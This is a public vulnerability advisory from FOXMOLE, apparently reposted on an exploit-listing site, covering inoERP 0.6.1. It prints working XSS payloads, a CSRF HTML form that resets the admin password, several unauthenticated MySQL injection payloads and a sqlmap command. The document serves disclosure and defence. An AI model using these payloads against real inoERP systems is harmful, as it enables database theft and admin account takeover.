inoERP 0.6.1 CSRF / XSS / SQL Injection

Credit: foxmole
Risk: Medium
Local: No
Remote: Yes

inoERP - Multiple Issues ~~~~~~~~~~~~~~~~~~~~~~~~~ Affected Versions ================= inoERP 0.6.1 Issue Overview ============== Vulnerability Type: SQL Injection, Cross Site Scripting, Cross Site Request Forgery, Session Fixation Technical Risk: critical Likelihood of Exploitation: medium Vendor: inoERP Vendor URL: / Credits: FOXMOLE employee Tim Herres Advisory URL: Advisory Status: Public OVE-ID: OVE-20170126-0002 CVSS 2.0: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C) Impact ====== There are multiple SQL Injection vulnerabilities, exploitable without authentication. An attacker could use the SQL Injection to access the database in an unsafe way. This means there is a high impact to all applications. The inoERP software also lacks in input validation resulting in different reflected/stored XSS vulnerabilities. Issue Description ================= The following findings are only examples, there are quite more. The whole application should be reviewed. All items tested using FF52. 1.) Cross Site Scripting: Stored: Create a new Question in the -->Forum --> Ask a question Vulnerable fields : Title, Content Used Payload: Test<script>alert("xss")</script> Response: [...] <title>Test<script>alert("xss")</script> - inoERP!</title> [...] The latest questions are included in the start page which means the entered payload gets executed directly in the start page. Reflected: With Auth: %3C/scRipt%3E Unauthenticated:'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(%22xss%22)%3C/scRipt%3E 2.) No protection against Cross Site Request Forgery Attacks: PoC: Changing the admin user credentials. <html> <body> <form action="http://<IP>/inoerp/form.php?class_name=user" method="POST"> <input type="hidden" name="headerData[0][name]" value="user_id[]" /> <input type="hidden" name="headerData[0][value]" value="1" /> <input type="hidden" name="headerData[1][name]" value="username[]" /> <input type="hidden" name="headerData[1][value]" value="inoerp" /> <input type="hidden" name="headerData[2][name]" value="enteredPassword[]" /> <input type="hidden" name="headerData[2][value]" value="test" /> <input type="hidden" name="headerData[3][name]" value="enteredRePassword[]" /> <input type="hidden" name="headerData[3][value]" value="test" /> <input type="hidden" name="headerData[4][name]" value="first_name[]" /> <input type="hidden" name="headerData[4][value]" value="inoerp" /> <input type="hidden" name="headerData[5][name]" value="last_name[]" /> <input type="hidden" name="headerData[5][value]" value="inoerp" /> <input type="hidden" name="headerData[6][name]" value="email[]" /> <input type="hidden" name="headerData[6][value]" value="" /> <input type="hidden" name="headerData[7][name]" value="phone[]" /> [..snipped...] If a privileged user activates the request, the admin user id=1 is set to "test". 3.) SQL Injection: Auth required:No ##### Parameter: module_code (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: module_code=test' RLIKE (SELECT (CASE WHEN (2838=2838) THEN 0x74657374 ELSE 0x28 END))-- qkmO Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: module_code=test' AND (SELECT 8706 FROM(SELECT COUNT(*),CONCAT(0x716b7a6271,(SELECT (ELT(8706=8706,1))),0x7171626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NPEq Type: stacked queries Title: MySQL > 5.0.11 stacked queries (comment) Payload: module_code=test';SELECT SLEEP(5)# Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: module_code=test' OR SLEEP(5)-- STgC Exploitable using e.g. SQLMAP Blind SQL Injection: sqlmap -u "" -p "content_type%5b%5d" --dbms="MySQL" Parameter: content_type[] (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: content_type[]=-8366' OR 7798=7798 AND 'eanR'='eanR&search_text=3&search_document_list[]=all Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: content_type[]=test' OR SLEEP(5) AND 'exIO'='exIO&search_text=3&search_document_list[]=all ##### 4.) Session Fixation: After a successful login the SessionID PHPSESSID remains the same: Before Login: INOERP123123=t4e5ef5kqnv6d1u2uguf7lraa2 After Login: INOERP123123=t4e5ef5kqnv6d1u2uguf7lraa2 Temporary Workaround and Fix ============================ FOXMOLE advises to restrict the access to all vulnerable inoERP systems until all vulnerabilities are fixed. History ======= 2017-01-25 Issue discovered 2017-01-26 Vendor contacted -> no response 2017-02-20 Vendor contacted again -> no response 2017-03-06 Vendor contacted again -> no response 2017-03-27 Advisory Release GPG Signature ============= This advisory is signed with the GPG key of the FOXMOLE advisories team. The key can be downloaded here:

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018,


Back to Top